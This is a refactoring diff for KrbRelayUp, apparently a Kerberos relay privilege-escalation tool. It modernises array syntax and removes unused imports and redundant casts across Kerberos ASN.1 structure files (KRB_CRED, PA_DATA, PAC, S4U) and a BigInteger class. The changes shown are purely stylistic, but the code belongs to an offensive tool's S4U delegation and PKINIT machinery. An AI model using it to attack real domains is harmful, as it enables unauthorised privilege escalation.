-            AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { blob });
+            AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { blob });
             blobSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, blobSeq);
 
             // etype == 0 -> no encryption
             AsnElt etypeAsn = AsnElt.MakeInteger(0);
-            AsnElt etypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { etypeAsn });
+            AsnElt etypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { etypeAsn });
             etypeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, etypeSeq);
 
-            AsnElt infoSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { etypeSeq, blobSeq });
-            AsnElt infoSeq2 = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { infoSeq });
+            AsnElt infoSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { etypeSeq, blobSeq });
+            AsnElt infoSeq2 = AsnElt.Make(AsnElt.SEQUENCE, new[] { infoSeq });
             infoSeq2 = AsnElt.MakeImplicit(AsnElt.CONTEXT, 3, infoSeq2);
 
 
             // all the components
-            AsnElt total = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { pvnoSeq, msg_typeSeq, ticketSeq2, infoSeq2 });
+            AsnElt total = AsnElt.Make(AsnElt.SEQUENCE, new[] { pvnoSeq, msg_typeSeq, ticketSeq2, infoSeq2 });
 
             // tag the final total ([APPLICATION 22])
-            AsnElt final = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { total });
+            AsnElt final = AsnElt.Make(AsnElt.SEQUENCE, new[] { total });
             final = AsnElt.MakeImplicit(AsnElt.APPLICATION, 22, final);
 
             return final;

--- a/KrbRelayUp/Kerb/krb_structures/KRB_PRIV.cs
+++ b/KrbRelayUp/Kerb/krb_structures/KRB_PRIV.cs
@@ -28,13 +28,13 @@ namespace KrbRelayUp
         {
             // pvno            [0] INTEGER (5)
             AsnElt pvnoAsn = AsnElt.MakeInteger(pvno);
-            AsnElt pvnoSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { pvnoAsn });
+            AsnElt pvnoSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { pvnoAsn });
             pvnoSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, pvnoSeq);
 
 
             // msg-type        [1] INTEGER (21)
             AsnElt msg_typeAsn = AsnElt.MakeInteger(msg_type);
-            AsnElt msg_typeSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { msg_typeAsn });
+            AsnElt msg_typeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { msg_typeAsn });
             msg_typeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 1, msg_typeSeq);
 
             // enc-part        [3] EncryptedData -- EncKrbPrivPart
@@ -42,26 +42,26 @@ namespace KrbRelayUp
 
             // etype
             AsnElt etypeAsn = AsnElt.MakeInteger((int)etype);
-            AsnElt etypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { etypeAsn });
+            AsnElt etypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { etypeAsn });
             etypeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, etypeSeq);
 
             // now encrypt the enc_part (EncKrbPrivPart)
             //  KRB_KEY_USAGE_KRB_PRIV_ENCRYPTED_PART = 13;
             byte[] encBytes = Crypto.KerberosEncrypt(etype, Interop.KRB_KEY_USAGE_KRB_PRIV_ENCRYPTED_PART, ekey, enc_partAsn.Encode());
             AsnElt blob = AsnElt.MakeBlob(encBytes);
-            AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { blob });
+            AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { blob });
             blobSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, blobSeq);
 
-            AsnElt encPrivSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { etypeSeq, blobSeq });
-            AsnElt encPrivSeq2 = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { encPrivSeq });
+            AsnElt encPrivSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { etypeSeq, blobSeq });
+            AsnElt encPrivSeq2 = AsnElt.Make(AsnElt.SEQUENCE, new[] { encPrivSeq });
             encPrivSeq2 = AsnElt.MakeImplicit(AsnElt.CONTEXT, 3, encPrivSeq2);
 
 
             // all the components
-            AsnElt total = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { pvnoSeq, msg_typeSeq, encPrivSeq2 });
+            AsnElt total = AsnElt.Make(AsnElt.SEQUENCE, new[] { pvnoSeq, msg_typeSeq, encPrivSeq2 });
 
             // tag the final total ([APPLICATION 21])
-            AsnElt final = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { total });
+            AsnElt final = AsnElt.Make(AsnElt.SEQUENCE, new[] { total });
             final = AsnElt.MakeImplicit(AsnElt.APPLICATION, 21, final);
 
             return final;

--- a/KrbRelayUp/Kerb/krb_structures/KRB_PRIV.cs
+++ b/KrbRelayUp/Kerb/krb_structures/KRB_PRIV.cs
@@ -1,6 +1,4 @@
-﻿using System;
-using Asn1;
-using System.Collections.Generic;
+﻿using Asn1;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/KrbAlgorithmIdentifier.cs
+++ b/KrbRelayUp/Kerb/krb_structures/KrbAlgorithmIdentifier.cs
@@ -21,7 +21,7 @@ namespace KrbRelayUp
             AsnElt parameters = AsnElt.Decode(Parameters);
 
             return AsnElt.Make(
-                AsnElt.SEQUENCE, new AsnElt[] {
+                AsnElt.SEQUENCE, new[] {
                     AsnElt.MakeOID(Algorithm.Value),
                     parameters}
                 );

--- a/KrbRelayUp/Kerb/krb_structures/KrbAuthPack.cs
+++ b/KrbRelayUp/Kerb/krb_structures/KrbAuthPack.cs
@@ -23,7 +23,7 @@ namespace KrbRelayUp
         {
 
             return AsnElt.Make(AsnElt.SEQUENCE,
-                new AsnElt[] {
+                new[] {
                     AsnElt.Make(AsnElt.CONTEXT,0, Authenticator.Encode()),
                     AsnElt.Make(AsnElt.CONTEXT,1, ClientPublicValue.Encode() ),
                     //AsnElt.Make(AsnElt.CONTEXT,2, new AsnElt[]{ CMSTypes } ),

--- a/KrbRelayUp/Kerb/krb_structures/KrbAuthPack.cs
+++ b/KrbRelayUp/Kerb/krb_structures/KrbAuthPack.cs
@@ -1,4 +1,5 @@
-﻿using Asn1;
+﻿using System;
+using Asn1;
 using System.Security.Cryptography.X509Certificates;
 
 namespace KrbRelayUp
@@ -16,7 +17,7 @@ namespace KrbRelayUp
         {
             Authenticator = authenticator;
             Certificate = certificate;
-            ClientDHNonce = new byte[0];
+            ClientDHNonce = Array.Empty<byte>();
         }
 
         public AsnElt Encode()

--- a/KrbRelayUp/Kerb/krb_structures/KrbPkAuthenticator.cs
+++ b/KrbRelayUp/Kerb/krb_structures/KrbPkAuthenticator.cs
@@ -32,11 +32,11 @@ namespace KrbRelayUp
 
             AsnElt asnCTime = AsnElt.MakeString(AsnElt.GeneralizedTime, CTime.ToString("yyyyMMddHHmmssZ"));
 
-            return AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] {
-                    AsnElt.Make(AsnElt.CONTEXT,0, new AsnElt[] { AsnElt.MakeInteger(CuSec) }),
-                    AsnElt.Make(AsnElt.CONTEXT,1, new AsnElt[]{ asnCTime } ),
-                    AsnElt.Make(AsnElt.CONTEXT,2, new AsnElt[]{ AsnElt.MakeInteger(Nonce) } ),
-                    AsnElt.Make(AsnElt.CONTEXT,3, new AsnElt[]{ AsnElt.MakeBlob(paChecksum) })
+            return AsnElt.Make(AsnElt.SEQUENCE, new[] {
+                    AsnElt.Make(AsnElt.CONTEXT,0, new[] { AsnElt.MakeInteger(CuSec) }),
+                    AsnElt.Make(AsnElt.CONTEXT,1, new[]{ asnCTime } ),
+                    AsnElt.Make(AsnElt.CONTEXT,2, new[]{ AsnElt.MakeInteger(Nonce) } ),
+                    AsnElt.Make(AsnElt.CONTEXT,3, new[]{ AsnElt.MakeBlob(paChecksum) })
                 });
         }
     }

--- a/KrbRelayUp/Kerb/krb_structures/KrbSubjectPublicKeyInfo.cs
+++ b/KrbRelayUp/Kerb/krb_structures/KrbSubjectPublicKeyInfo.cs
@@ -17,7 +17,7 @@ namespace KrbRelayUp
         public AsnElt Encode()
         {
             return AsnElt.Make(
-                AsnElt.SEQUENCE, new AsnElt[] {
+                AsnElt.SEQUENCE, new[] {
                     Algorithm.Encode(),
                     AsnElt.MakeBitString(SubjectPublicKey)
             });

--- a/KrbRelayUp/Kerb/krb_structures/LastReq.cs
+++ b/KrbRelayUp/Kerb/krb_structures/LastReq.cs
@@ -1,7 +1,5 @@
 ﻿using System;
 using Asn1;
-using System.Text;
-using System.Collections.Generic;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/PA_DATA.cs
+++ b/KrbRelayUp/Kerb/krb_structures/PA_DATA.cs
@@ -99,7 +99,7 @@ namespace KrbRelayUp
             KrbPkAuthenticator authenticator = new KrbPkAuthenticator((uint)now.Millisecond, now, now.Millisecond, kdcRequestBody);
             KrbAuthPack authPack = new KrbAuthPack(authenticator, pkInitCert);
 
-            byte[] pubKeyInfo = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] {
+            byte[] pubKeyInfo = AsnElt.Make(AsnElt.SEQUENCE, new[] {
                 AsnElt.MakeInteger(agreement.P),
                 AsnElt.MakeInteger(agreement.G),
             }).Encode();
@@ -151,7 +151,7 @@ namespace KrbRelayUp
         {
             // padata-type     [1] Int32
             AsnElt typeElt = AsnElt.MakeInteger((long)type);
-            AsnElt nameTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { typeElt });
+            AsnElt nameTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { typeElt });
             nameTypeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 1, nameTypeSeq);
 
             AsnElt paDataElt;
@@ -163,71 +163,71 @@ namespace KrbRelayUp
                 paDataElt = ((KERB_PA_PAC_REQUEST)value).Encode();
                 paDataElt = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, paDataElt);
 
-                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { nameTypeSeq, paDataElt });
+                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new[] { nameTypeSeq, paDataElt });
                 return seq;
             }
             else if (type == Interop.PADATA_TYPE.ENC_TIMESTAMP)
             {
                 // used for AS-REQs
                 AsnElt blob = AsnElt.MakeBlob(((EncryptedData)value).Encode().Encode());
-                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { blob });
+                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { blob });
                 blobSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, blobSeq);
 
-                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { nameTypeSeq, blobSeq });
+                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new[] { nameTypeSeq, blobSeq });
                 return seq;
             }
             else if (type == Interop.PADATA_TYPE.AP_REQ)
             {
                 // used for TGS-REQs
                 AsnElt blob = AsnElt.MakeBlob(((AP_REQ)value).Encode().Encode());
-                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { blob });
+                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { blob });
 
                 paDataElt = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, blobSeq);
 
-                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { nameTypeSeq, paDataElt });
+                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new[] { nameTypeSeq, paDataElt });
                 return seq;
             }
             else if (type == Interop.PADATA_TYPE.S4U2SELF)
             {
                 // used for constrained delegation
                 AsnElt blob = AsnElt.MakeBlob(((PA_FOR_USER)value).Encode().Encode());
-                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { blob });
+                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { blob });
 
                 paDataElt = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, blobSeq);
 
-                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { nameTypeSeq, paDataElt });
+                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new[] { nameTypeSeq, paDataElt });
                 return seq;
             }
             else if (type == Interop.PADATA_TYPE.PA_S4U_X509_USER)
             {
                 // used for constrained delegation
                 AsnElt blob = AsnElt.MakeBlob(((PA_S4U_X509_USER)value).Encode().Encode());
-                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { blob });
+                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { blob });
 
                 paDataElt = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, blobSeq);
 
-                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { nameTypeSeq, paDataElt });
+                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new[] { nameTypeSeq, paDataElt });
                 return seq;
             }
             else if (type == Interop.PADATA_TYPE.PA_PAC_OPTIONS)
             {
                 AsnElt blob = AsnElt.MakeBlob(((PA_PAC_OPTIONS)value).Encode().Encode());
-                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { blob });
+                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { blob });
 
                 paDataElt = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, blobSeq);
 
-                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { nameTypeSeq, paDataElt });
+                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new[] { nameTypeSeq, paDataElt });
                 return seq;
             }
             else if (type == Interop.PADATA_TYPE.PK_AS_REQ)
             {
 
                 AsnElt blob = AsnElt.MakeBlob(((PA_PK_AS_REQ)value).Encode().Encode());
-                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { blob });
+                AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { blob });
 
                 paDataElt = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, blobSeq);
 
-                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { nameTypeSeq, paDataElt });
+                AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new[] { nameTypeSeq, paDataElt });
                 return seq;
             }
             else

--- a/KrbRelayUp/Kerb/krb_structures/PA_ENC_TS_ENC.cs
+++ b/KrbRelayUp/Kerb/krb_structures/PA_ENC_TS_ENC.cs
@@ -1,6 +1,5 @@
 ﻿using Asn1;
 using System;
-using System.Text;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/PA_PAC_OPTIONS.cs
+++ b/KrbRelayUp/Kerb/krb_structures/PA_PAC_OPTIONS.cs
@@ -1,7 +1,4 @@
-﻿using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
+﻿using System.Collections.Generic;
 using Asn1;
 
 namespace KrbRelayUp

--- a/KrbRelayUp/Kerb/krb_structures/PA_PK_AS_REQ.cs
+++ b/KrbRelayUp/Kerb/krb_structures/PA_PK_AS_REQ.cs
@@ -39,8 +39,8 @@ namespace KrbRelayUp
             }
             signed.ComputeSignature(signer, silent: false);
 
-            return AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] {
-                AsnElt.Make(AsnElt.CONTEXT, 0, new AsnElt[]{
+            return AsnElt.Make(AsnElt.SEQUENCE, new[] {
+                AsnElt.Make(AsnElt.CONTEXT, 0, new[]{
                     AsnElt.MakeBlob(signed.Encode())
                     //AsnElt.Decode(signed.Encode())
                 })

--- a/KrbRelayUp/Kerb/krb_structures/PA_S4U_X509_USER.cs
+++ b/KrbRelayUp/Kerb/krb_structures/PA_S4U_X509_USER.cs
@@ -38,7 +38,7 @@ namespace KrbRelayUp
             AsnElt checksumAsn = cksum.Encode();
             checksumAsn = AsnElt.MakeImplicit(AsnElt.CONTEXT, 1, checksumAsn);
 
-            AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { userIDSeq, checksumAsn });
+            AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new[] { userIDSeq, checksumAsn });
 
             return seq;
         }

--- a/KrbRelayUp/Kerb/krb_structures/PA_S4U_X509_USER.cs
+++ b/KrbRelayUp/Kerb/krb_structures/PA_S4U_X509_USER.cs
@@ -1,7 +1,4 @@
 ﻿using Asn1;
-using System;
-using System.Collections.Generic;
-using System.Text;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/PrincipalName.cs
+++ b/KrbRelayUp/Kerb/krb_structures/PrincipalName.cs
@@ -68,7 +68,7 @@ namespace KrbRelayUp
         {
             // name-type[0] Int32
             AsnElt nameTypeElt = AsnElt.MakeInteger((long)name_type);
-            AsnElt nameTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { nameTypeElt });
+            AsnElt nameTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { nameTypeElt });
             nameTypeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, nameTypeSeq);
 
 

--- a/KrbRelayUp/Kerb/krb_structures/PrincipalName.cs
+++ b/KrbRelayUp/Kerb/krb_structures/PrincipalName.cs
@@ -1,5 +1,4 @@
 ﻿using Asn1;
-using System;
 using System.Collections.Generic;
 using System.Text;
 

--- a/KrbRelayUp/Kerb/krb_structures/S4UUserID.cs
+++ b/KrbRelayUp/Kerb/krb_structures/S4UUserID.cs
@@ -1,7 +1,6 @@
 ﻿using Asn1;
 using System;
 using System.Collections.Generic;
-using System.Text;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/TGS_REP.cs
+++ b/KrbRelayUp/Kerb/krb_structures/TGS_REP.cs
@@ -1,5 +1,4 @@
 ﻿using Asn1;
-using System;
 using System.Text;
 
 namespace KrbRelayUp

--- a/KrbRelayUp/Kerb/krb_structures/TGS_REP.cs
+++ b/KrbRelayUp/Kerb/krb_structures/TGS_REP.cs
@@ -25,12 +25,12 @@ namespace KrbRelayUp
             //  false == ignore trailing garbage
             AsnElt asn_TGS_REP = AsnElt.Decode(data, false);
 
-            this.Decode(asn_TGS_REP);
+            Decode(asn_TGS_REP);
         }
 
         public TGS_REP(AsnElt asn_TGS_REP)
         {
-            this.Decode(asn_TGS_REP);
+            Decode(asn_TGS_REP);
         }
 
         private void Decode(AsnElt asn_TGS_REP)

--- a/KrbRelayUp/Kerb/krb_structures/TGS_REQ.cs
+++ b/KrbRelayUp/Kerb/krb_structures/TGS_REQ.cs
@@ -1,7 +1,6 @@
 ﻿using Asn1;
 using System;
 using System.Collections.Generic;
-using System.IO;
 using System.Net;
 
 namespace KrbRelayUp

--- a/KrbRelayUp/Kerb/krb_structures/Ticket.cs
+++ b/KrbRelayUp/Kerb/krb_structures/Ticket.cs
@@ -55,7 +55,7 @@ namespace KrbRelayUp
         {
             // tkt-vno         [0] INTEGER (5)
             AsnElt tkt_vnoAsn = AsnElt.MakeInteger(tkt_vno);
-            AsnElt tkt_vnoSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { tkt_vnoAsn });
+            AsnElt tkt_vnoSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { tkt_vnoAsn });
             tkt_vnoSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, tkt_vnoSeq);
 
 

--- a/KrbRelayUp/Kerb/krb_structures/Ticket.cs
+++ b/KrbRelayUp/Kerb/krb_structures/Ticket.cs
@@ -1,8 +1,6 @@
 ﻿using System;
 using Asn1;
 using System.Text;
-using System.Collections.Generic;
-using KrbRelayUp.Kerberos;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/TransitedEncoding.cs
+++ b/KrbRelayUp/Kerb/krb_structures/TransitedEncoding.cs
@@ -1,7 +1,4 @@
-﻿using System;
-using Asn1;
-using System.Text;
-using System.Collections.Generic;
+﻿using Asn1;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/krb_structures/TransitedEncoding.cs
+++ b/KrbRelayUp/Kerb/krb_structures/TransitedEncoding.cs
@@ -37,7 +37,7 @@ namespace KrbRelayUp
         {
             // tr-type            [0] Int32
             AsnElt trTypeElt = AsnElt.MakeInteger((long)tr_type);
-            AsnElt trTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { trTypeElt });
+            AsnElt trTypeSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { trTypeElt });
             trTypeSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 0, trTypeSeq);
 
             AsnElt seq;
@@ -46,7 +46,7 @@ namespace KrbRelayUp
             if (contents != null)
             {
                 AsnElt contentsElt = AsnElt.MakeBlob(contents);
-                AsnElt contentsSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[] { contentsElt });
+                AsnElt contentsSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { contentsElt });
                 contentsSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 1, contentsSeq);
                 seq = AsnElt.Make(AsnElt.SEQUENCE, new[] { trTypeSeq, contentsSeq });
             }

--- a/KrbRelayUp/Kerb/krb_structures/TransitedEncoding.cs
+++ b/KrbRelayUp/Kerb/krb_structures/TransitedEncoding.cs
@@ -1,4 +1,5 @@
-﻿using Asn1;
+﻿using System;
+using Asn1;
 
 namespace KrbRelayUp
 {
@@ -11,7 +12,7 @@ namespace KrbRelayUp
         public TransitedEncoding()
         {
             tr_type = Interop.TransitedEncodingType.NULL;
-            contents = new byte[0];
+            contents = Array.Empty<byte>();
         }
 
         public TransitedEncoding(AsnElt body)

--- a/KrbRelayUp/Kerb/krb_structures/pac/Attributes.cs
+++ b/KrbRelayUp/Kerb/krb_structures/pac/Attributes.cs
@@ -1,5 +1,4 @@
-﻿using System;
-using System.IO;
+﻿using System.IO;
 
 namespace KrbRelayUp.Kerberos.PAC
 {

--- a/KrbRelayUp/Kerb/krb_structures/pac/Attributes.cs
+++ b/KrbRelayUp/Kerb/krb_structures/pac/Attributes.cs
@@ -11,7 +11,7 @@ namespace KrbRelayUp.Kerberos.PAC
 
         public Attributes(PacInfoBufferType type)
         {
-            this.Type = type;
+            Type = type;
         }
 
         public Attributes()

--- a/KrbRelayUp/Kerb/krb_structures/pac/ClientName.cs
+++ b/KrbRelayUp/Kerb/krb_structures/pac/ClientName.cs
@@ -1,7 +1,5 @@
 ﻿using System;
-using System.Collections.Generic;
 using System.IO;
-using System.Linq;
 using System.Text;
 
 namespace KrbRelayUp.Kerberos.PAC

--- a/KrbRelayUp/Kerb/krb_structures/pac/LogonInfo.cs
+++ b/KrbRelayUp/Kerb/krb_structures/pac/LogonInfo.cs
@@ -1,8 +1,5 @@
 ﻿using KrbRelayUp.Ndr.Marshal;
 using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
 using KrbRelayUp.Ndr;
 
 namespace KrbRelayUp.Kerberos.PAC

--- a/KrbRelayUp/Kerb/krb_structures/pac/PACTYPE.cs
+++ b/KrbRelayUp/Kerb/krb_structures/pac/PACTYPE.cs
@@ -83,7 +83,7 @@ namespace KrbRelayUp.Kerberos
 
                 byte[] pacBuffer = pacInfoBuffer.Encode();
                 bw.Write((int)pacInfoBuffer.Type);
-                bw.Write((int)pacBuffer.Length);
+                bw.Write(pacBuffer.Length);
                 bw.Write(offset);
 
                 long oldPosition = bw.BaseStream.Position;

--- a/KrbRelayUp/Kerb/krb_structures/pac/PACTYPE.cs
+++ b/KrbRelayUp/Kerb/krb_structures/pac/PACTYPE.cs
@@ -1,10 +1,6 @@
 ﻿using KrbRelayUp.Kerberos.PAC;
-using System;
 using System.Collections.Generic;
 using System.IO;
-using System.Linq;
-using System.Runtime.InteropServices;
-using System.Text;
 
 namespace KrbRelayUp.Kerberos
 {

--- a/KrbRelayUp/Kerb/krb_structures/pac/PacCredentialInfo.cs
+++ b/KrbRelayUp/Kerb/krb_structures/pac/PacCredentialInfo.cs
@@ -1,10 +1,7 @@
 ﻿using KrbRelayUp.Ndr.Marshal;
 using KrbRelayUp.Ndr;
 using System;
-using System.Collections.Generic;
 using System.IO;
-using System.Linq;
-using System.Text;
 
 namespace KrbRelayUp.Kerberos.PAC
 {

--- a/KrbRelayUp/Kerb/krb_structures/pac/PacInfoBuffer.cs
+++ b/KrbRelayUp/Kerb/krb_structures/pac/PacInfoBuffer.cs
@@ -1,8 +1,4 @@
-﻿using System;
-using System.Collections.Generic;
-using System.IO;
-using System.Linq;
-using System.Text;
+﻿using System.IO;
 
 namespace KrbRelayUp.Kerberos.PAC
 {

--- a/KrbRelayUp/Kerb/krb_structures/pac/Requestor.cs
+++ b/KrbRelayUp/Kerb/krb_structures/pac/Requestor.cs
@@ -9,7 +9,7 @@ namespace KrbRelayUp.Kerberos.PAC
 
         public Requestor(PacInfoBufferType type)
         {
-            this.Type = type;
+            Type = type;
         }
 
         public Requestor(SecurityIdentifier sid)

--- a/KrbRelayUp/Kerb/krb_structures/pac/S4UDelegationInfo.cs
+++ b/KrbRelayUp/Kerb/krb_structures/pac/S4UDelegationInfo.cs
@@ -1,8 +1,4 @@
 ﻿using System;
-using System.Collections.Generic;
-using System.IO;
-using System.Linq;
-using System.Text;
 using KrbRelayUp.Ndr;
 using KrbRelayUp.Ndr.Marshal;
 

--- a/KrbRelayUp/Kerb/krb_structures/pac/SignatureData.cs
+++ b/KrbRelayUp/Kerb/krb_structures/pac/SignatureData.cs
@@ -1,8 +1,4 @@
-﻿using System;
-using System.Collections.Generic;
-using System.IO;
-using System.Linq;
-using System.Text;
+﻿using System.IO;
 
 namespace KrbRelayUp.Kerberos.PAC
 {

--- a/KrbRelayUp/Kerb/krb_structures/pac/SignatureData.cs
+++ b/KrbRelayUp/Kerb/krb_structures/pac/SignatureData.cs
@@ -11,7 +11,7 @@ namespace KrbRelayUp.Kerberos.PAC
 
         public SignatureData(PacInfoBufferType type)
         {
-            this.Type = type;
+            Type = type;
         }
 
         public SignatureData(byte[] data, PacInfoBufferType type) : base(data, type)

--- a/KrbRelayUp/Kerb/krb_structures/pac/UpnDns.cs
+++ b/KrbRelayUp/Kerb/krb_structures/pac/UpnDns.cs
@@ -1,7 +1,4 @@
-﻿using System;
-using System.Collections.Generic;
-using System.IO;
-using System.Linq;
+﻿using System.IO;
 using System.Text;
 
 namespace KrbRelayUp.Kerberos.PAC

--- a/KrbRelayUp/Kerb/math/BigInteger.cs
+++ b/KrbRelayUp/Kerb/math/BigInteger.cs
@@ -174,30 +174,30 @@ namespace Mono.Math
         public BigInteger()
         {
             data = new uint[DEFAULT_LEN];
-            this.length = DEFAULT_LEN;
+            length = DEFAULT_LEN;
         }
 
         public BigInteger(Sign sign, uint len)
         {
-            this.data = new uint[len];
-            this.length = len;
+            data = new uint[len];
+            length = len;
         }
 
         public BigInteger(BigInteger bi)
         {
-            this.data = (uint[])bi.data.Clone();
-            this.length = bi.length;
+            data = (uint[])bi.data.Clone();
+            length = bi.length;
         }
 
         public BigInteger(BigInteger bi, uint len)
         {
 
-            this.data = new uint[len];
+            data = new uint[len];
 
             for (uint i = 0; i < bi.length; i++)
-                this.data[i] = bi.data[i];
+                data[i] = bi.data[i];
 
-            this.length = bi.length;
+            length = bi.length;
         }
 
         #endregion
@@ -228,12 +228,12 @@ namespace Mono.Math
 
             switch (leftOver)
             {
-                case 1: data[length - 1] = (uint)inData[0]; break;
+                case 1: data[length - 1] = inData[0]; break;
                 case 2: data[length - 1] = (uint)((inData[0] << 8) | inData[1]); break;
                 case 3: data[length - 1] = (uint)((inData[0] << 16) | (inData[1] << 8) | inData[2]); break;
             }
 
-            this.Normalize();
+            Normalize();
         }
 
         public BigInteger(uint[] inData)
@@ -247,12 +247,12 @@ namespace Mono.Math
             for (int i = (int)length - 1, j = 0; i >= 0; i--, j++)
                 data[j] = inData[i];
 
-            this.Normalize();
+            Normalize();
         }
 
         public BigInteger(uint ui)
         {
-            data = new uint[] { ui };
+            data = new[] { ui };
         }
 
         public BigInteger(ulong ul)
@@ -260,7 +260,7 @@ namespace Mono.Math
             data = new uint[2] { (uint)ul, (uint)(ul >> 32) };
             length = 2;
 
-            this.Normalize();
+            Normalize();
         }
 
         public static implicit operator BigInteger(uint value)
@@ -380,7 +380,7 @@ namespace Mono.Math
 
         public static uint operator %(BigInteger bi, uint ui)
         {
-            return Kernel.DwordMod(bi, (uint)ui);
+            return Kernel.DwordMod(bi, ui);
         }
 
         public static BigInteger operator %(BigInteger bi1, BigInteger bi2)
@@ -521,14 +521,14 @@ namespace Mono.Math
             byte[] random = new byte[dwords << 2];
 
             rng.GetBytes(random);
-            Buffer.BlockCopy(random, 0, ret.data, 0, (int)dwords << 2);
+            Buffer.BlockCopy(random, 0, ret.data, 0, dwords << 2);
 
             if (remBits != 0)
             {
                 uint mask = (uint)(0x01 << (remBits - 1));
                 ret.data[dwords - 1] |= mask;
 
-                mask = (uint)(0xFFFFFFFF >> (32 - remBits));
+                mask = 0xFFFFFFFF >> (32 - remBits);
                 ret.data[dwords - 1] &= mask;
             }
             else
@@ -557,7 +557,7 @@ namespace Mono.Math
             if (this == 0)
                 return;
 
-            int bits = this.BitCount();
+            int bits = BitCount();
             int dwords = bits >> 5;
             int remBits = bits & 0x1F;
 
